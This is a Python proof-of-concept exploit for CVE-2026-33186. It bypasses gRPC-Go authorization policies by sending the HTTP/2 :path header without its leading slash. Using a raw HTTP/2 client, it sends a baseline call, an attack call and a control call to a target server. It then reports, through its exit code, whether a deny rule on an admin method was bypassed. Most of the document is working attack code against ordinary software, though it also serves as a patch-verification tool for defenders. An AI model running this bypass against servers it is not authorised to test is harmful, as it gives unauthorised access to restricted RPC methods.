#!/usr/bin/env python3
"""
CVE-2026-33186 gRPC-Go authorization policy bypass via missing leading slash

Requirements:
  pip install h2   (pure-Python HTTP/2 implementation)
  Python >= 3.8

Usage:
  python3 poc.py [--host HOST] [--port PORT] [--service SVC] [--method MTH]
  python3 poc.py --help
"""

import argparse
import socket
import struct
import sys
import time

try:
    import h2.config
    import h2.connection
    import h2.events
except ImportError:
    # Reported from main() instead of exiting here, so that --help keeps
    # working and the failure maps to the documented "error" exit code.
    h2 = None

# Exit codes, as documented in the --help epilog.
EXIT_VULNERABLE = 0
EXIT_PATCHED = 1
EXIT_ERROR = 2

H2_MISSING_MESSAGE = "[!] h2 library not found. Install with: pip install h2"

# Size of the gRPC message prefix: 1-byte compressed flag + 4-byte length.
GRPC_HEADER_LEN = 5

# Protobuf tag byte for field number 1 with wire type 2 (length-delimited).
PROTO_FIELD1_LEN_TAG = 0x0A

GRPC_STATUS_NAMES = {
    0: "OK",
    1: "Cancelled",
    2: "Unknown",
    3: "InvalidArgument",
    5: "NotFound",
    7: "PermissionDenied",
    12: "Unimplemented",
    13: "Internal",
}


def encode_grpc_frame(data: bytes) -> bytes:
    """Encode payload as a gRPC data frame: 1-byte compressed flag + 4-byte length."""
    return b"\x00" + struct.pack(">I", len(data)) + data


def decode_grpc_frame(data: bytes) -> bytes:
    """Strip the 5-byte gRPC data frame header and return the first message.

    Input shorter than the header is returned unchanged. The declared length
    is honoured, so bytes following the first message are not returned; a
    truncated message yields whatever bytes are available.
    """
    if len(data) < GRPC_HEADER_LEN:
        return data
    (length,) = struct.unpack(">I", data[1:GRPC_HEADER_LEN])
    return data[GRPC_HEADER_LEN:GRPC_HEADER_LEN + length]


def _encode_varint(value: int) -> bytes:
    """Encode a non-negative integer as a protobuf base-128 varint."""
    out = bytearray()
    while value > 0x7F:
        out.append((value & 0x7F) | 0x80)
        value >>= 7
    out.append(value)
    return bytes(out)


def _decode_varint(data: bytes, pos: int):
    """Decode a varint starting at ``pos``.

    Returns ``(value, next_pos)``, or ``None`` when the varint is truncated
    or longer than 10 bytes (the maximum for a 64-bit value).
    """
    value = 0
    for shift in range(0, 70, 7):
        if pos >= len(data):
            return None
        byte = data[pos]
        pos += 1
        value |= (byte & 0x7F) << shift
        if not byte & 0x80:
            return value, pos
    return None


def decode_proto_string(data: bytes) -> str:
    """Decode field 1 (wire type 2) from a minimal protobuf message.

    Returns an empty string when ``data`` does not start with that field or
    when the declared length runs past the end of ``data``. Invalid UTF-8 is
    decoded with replacement characters.
    """
    if len(data) < 2 or data[0] != PROTO_FIELD1_LEN_TAG:
        return ""
    decoded = _decode_varint(data, 1)
    if decoded is None:
        return ""
    length, start = decoded
    if len(data) < start + length:
        return ""
    return data[start:start + length].decode("utf-8", errors="replace")


def encode_proto_string(s: str) -> bytes:
    """Encode a string as field 1 (wire type 2) in a protobuf message."""
    encoded = s.encode("utf-8")
    return bytes([PROTO_FIELD1_LEN_TAG]) + _encode_varint(len(encoded)) + encoded


def _flush(conn, sock) -> None:
    """Send any bytes the h2 connection has queued for the peer."""
    pending = conn.data_to_send(65535)
    if pending:
        sock.sendall(pending)


def _record_grpc_status(result: dict, headers) -> None:
    """Copy grpc-status / grpc-message from a header block into ``result``."""
    for name, value in headers:
        if name == "grpc-status":
            try:
                result["grpc_status"] = int(value)
            except ValueError:
                # A non-numeric status is left as-is (None unless already
                # set) so the summary reports it as unexpected, not a crash.
                pass
        elif name == "grpc-message":
            result["grpc_message"] = value


def send_grpc_call(host: str, port: int, path: str, payload: bytes, label: str) -> dict:
    """
    Send a single gRPC call using a raw HTTP/2 connection.

    host    -- server host to connect to
    port    -- server TCP port
    path    -- the :path pseudo-header value to send (may or may not have leading /)
    payload -- serialized protobuf request body
    label   -- human-readable label for logging

    Returns a dict with keys "grpc_status" (int or None), "grpc_message"
    (str or None), "response_body" (str or None) and "raw_body" (bytes).

    Raises RuntimeError when the h2 library is not installed, and OSError
    (including socket.timeout) when connecting or the initial exchange fails.
    The socket is always closed before returning or raising.
    """
    if h2 is None:
        raise RuntimeError(H2_MISSING_MESSAGE)

    print(f"\n{'='*60}")
    print(f" Call: {label}")
    print(f" :path header = {path!r}")
    print(f"{'='*60}")

    result = {
        "grpc_status": None,
        "grpc_message": None,
        "response_body": None,
        "raw_body": b"",
    }

    with socket.create_connection((host, port), timeout=5) as sock:
        config = h2.config.H2Configuration(
            client_side=True,
            header_encoding="utf-8",
        )
        conn = h2.connection.H2Connection(config=config)
        conn.initiate_connection()

        # Send connection preface
        _flush(conn, sock)

        # Read server preface (SETTINGS frame); the resulting events carry
        # nothing this script needs, so only the state machine is fed.
        conn.receive_data(sock.recv(65535))

        # ACK server settings
        _flush(conn, sock)

        # HEADERS frame with gRPC pseudo-headers.
        # :path is sent exactly as given by the caller.
        headers = [
            (":method", "POST"),
            (":scheme", "http"),
            (":path", path),
            (":authority", f"{host}:{port}"),
            ("content-type", "application/grpc"),
            ("te", "trailers"),
            ("grpc-encoding", "identity"),
            ("user-agent", "poc-cve-2026-33186/1.0"),
        ]
        stream_id = conn.get_next_available_stream_id()
        conn.send_headers(stream_id, headers)
        _flush(conn, sock)

        # DATA frame with END_STREAM
        conn.send_data(stream_id, encode_grpc_frame(payload), end_stream=True)
        _flush(conn, sock)

        # Read response: up to 5 s overall, giving up after 2 s of silence.
        sock.settimeout(2.0)
        deadline = time.monotonic() + 5.0
        finished = False
        while not finished and time.monotonic() < deadline:
            try:
                raw = sock.recv(65535)
            except socket.timeout:
                break
            if not raw:
                break

            for ev in conn.receive_data(raw):
                if isinstance(ev, h2.events.DataReceived):
                    result["raw_body"] += ev.data
                    conn.acknowledge_received_data(
                        ev.flow_controlled_length, ev.stream_id
                    )
                elif isinstance(
                    ev, (h2.events.TrailersReceived, h2.events.ResponseReceived)
                ):
                    # gRPC may put the status in trailers or, for
                    # trailers-only responses, in the initial headers.
                    _record_grpc_status(result, ev.headers)
                elif isinstance(ev, (h2.events.StreamEnded, h2.events.StreamReset)):
                    # A reset stream will never deliver more data; stop
                    # instead of waiting for the timeout.
                    finished = True
            _flush(conn, sock)

        conn.close_connection()
        try:
            _flush(conn, sock)
        except OSError:
            # Best effort: the peer may already have closed the connection.
            pass

    # Decode response body
    if result["raw_body"]:
        payload_bytes = decode_grpc_frame(result["raw_body"])
        result["response_body"] = decode_proto_string(payload_bytes)

    # Print result
    status = result["grpc_status"]
    status_name = GRPC_STATUS_NAMES.get(status, str(status))
    print(f" gRPC status: {status} ({status_name})")
    if result["grpc_message"]:
        print(f" gRPC message: {result['grpc_message']}")
    if result["response_body"]:
        print(f" Response: {result['response_body']}")

    return result


def main() -> None:
    """Run the baseline, attack and control calls, then exit with the verdict.

    Exit codes: 0 = vulnerable, 1 = patched, 2 = error (missing dependency,
    unreachable server, or baseline call not denied).
    """
    parser = argparse.ArgumentParser(
        description="CVE-2026-33186 PoC -- gRPC-Go authz bypass via :path without leading slash",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog=(
            "Examples:\n"
            " python3 poc.py\n"
            " python3 poc.py --host 10.0.0.5 --port 50051\n"
            " python3 poc.py --service MyService --method SecretMethod\n"
            "\n"
            "The PoC runs three calls to isolate the bypass:\n"
            " BASELINE -- canonical :path with slash, expect PermissionDenied (7)\n"
            " ATTACK -- :path without slash, expect OK (0) on vulnerable server\n"
            " CONTROL -- public method with slash, expect OK (0)\n"
            "\n"
            "Exit codes: 0=vulnerable, 1=patched, 2=error\n"
            "Requires: pip install h2"
        ),
    )
    parser.add_argument("--host", default="127.0.0.1",
                        help="gRPC server host (default: 127.0.0.1)")
    parser.add_argument("--port", type=int, default=50051,
                        help="gRPC server port (default: 50051)")
    parser.add_argument("--service", default="TestService",
                        help="gRPC service name to target (default: TestService)")
    parser.add_argument("--method", default="AdminMethod",
                        help="gRPC method name to bypass (default: AdminMethod)")
    parser.add_argument("--public-method", default="PublicMethod", dest="public_method",
                        help="method name for control call (default: PublicMethod)")
    args = parser.parse_args()

    if h2 is None:
        # Exit code 1 means "patched", so a missing dependency must not use it.
        print(H2_MISSING_MESSAGE)
        sys.exit(EXIT_ERROR)

    admin_path = f"/{args.service}/{args.method}"
    attack_path = f"{args.service}/{args.method}"
    public_path = f"/{args.service}/{args.public_method}"

    print()
    print("CVE-2026-33186 -- gRPC-Go Authorization Policy Bypass")
    print("Affected: google.golang.org/grpc < v1.79.3")
    print("Fixed in: v1.79.3 (PR #8981, 2026-03-17)")
    print()
    print(f"Target: {args.host}:{args.port}")
    print()
    print("Policy under test:")
    print(f" DENY {admin_path} <- deny rule (with slash)")
    print(f" ALLOW {public_path}")
    print(" ALLOW * (default)")

    # Protobuf request: field 1 = "poc"
    req_payload = encode_proto_string("poc")

    try:
        # Test 1: Normal path WITH leading slash -> should be DENIED (status 7)
        r1 = send_grpc_call(
            args.host, args.port,
            path=admin_path,
            payload=req_payload,
            label=f"BASELINE: {admin_path} (WITH slash) -- expect DENIED",
        )

        # Test 2: Bypass path WITHOUT leading slash -> should bypass deny rule
        r2 = send_grpc_call(
            args.host, args.port,
            path=attack_path,
            payload=req_payload,
            label=f"ATTACK: {attack_path} (NO slash) -- expect BYPASS",
        )

        # Test 3: Public method (control -- should always succeed)
        r3 = send_grpc_call(
            args.host, args.port,
            path=public_path,
            payload=req_payload,
            label=f"CONTROL: {public_path} (WITH slash) -- expect OK",
        )
    except OSError as exc:
        # An uncaught exception would exit with status 1, which this script
        # documents as "patched"; report connection failures as errors.
        print(f"\n [ERROR] Could not complete call to {args.host}:{args.port}: {exc}")
        sys.exit(EXIT_ERROR)

    # Summary
    print()
    print("=" * 60)
    print("SUMMARY")
    print("=" * 60)

    baseline_denied = r1["grpc_status"] == 7
    bypass_succeeded = r2["grpc_status"] == 0
    public_ok = r3["grpc_status"] == 0

    print(f" Baseline {admin_path} (with slash): status={r1['grpc_status']} "
          f"{'DENIED (correct)' if baseline_denied else 'UNEXPECTED'}")
    print(f" Attack {attack_path} (no slash): status={r2['grpc_status']} "
          f"{'BYPASS CONFIRMED' if bypass_succeeded else 'not bypassed'}")
    print(f" Control {public_path}: status={r3['grpc_status']} "
          f"{'OK (correct)' if public_ok else 'UNEXPECTED'}")
    print()

    if baseline_denied and bypass_succeeded:
        print(" [VULNERABLE] CVE-2026-33186 confirmed on this server.")
        print(" The deny rule is enforced for normal clients but bypassed")
        print(" by omitting the leading slash from the :path header.")
        sys.exit(EXIT_VULNERABLE)
    elif not baseline_denied:
        print(f" [ERROR] Baseline not denied (status={r1['grpc_status']}).")
        print(" Check that the server is running and authz policy is configured.")
        sys.exit(EXIT_ERROR)
    else:
        print(f" [PATCHED] Bypass returned status={r2['grpc_status']}.")
        print(" This server may be running grpc-go >= v1.79.3 (patched).")
        sys.exit(EXIT_PATCHED)


if __name__ == "__main__":
    main()